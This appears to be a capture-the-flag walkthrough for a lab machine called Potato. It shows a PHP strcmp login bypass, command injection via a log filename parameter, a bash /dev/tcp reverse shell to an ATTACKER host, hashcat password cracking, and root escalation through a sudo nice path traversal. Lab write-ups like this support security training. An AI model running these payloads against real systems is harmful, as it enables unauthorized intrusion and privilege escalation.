Potato combines ProFTP enumeration, a PHP login bypass trick, password cracking, and a sudo misconfiguration that allows escaping into a root shell.
Target: Potato
Initial vector: ProFTP / web login bypass
Privilege escalation: sudo nice /notes/* → path traversal
ProFTP is running on port 2112:
$ ftp 192.168.234.101 2112
welcome.msg shows:
Welcome, archive user %U@%R ! The local time is: %T
Web login uses strcmp in PHP. Bypass with array parameters:
username[]=""&password[]=""
This leads to command injection via a log filename parameter (append ; command).
Get a reverse shell:
$ nc -nlvp 443 # trigger via crafted request with "; /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'"
Dump password hashes and crack them:
$ hashcat -a 0 -m 500 hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt -> webadmin:dragon
Switch to webadmin:
$ su webadmin Password: dragon
Check sudo:
$ sudo -l
User webadmin may run the following commands on serv:
(ALL : ALL) /bin/nice /notes/*
Abuse path traversal:
$ sudo /bin/nice /notes/../bin/bash # id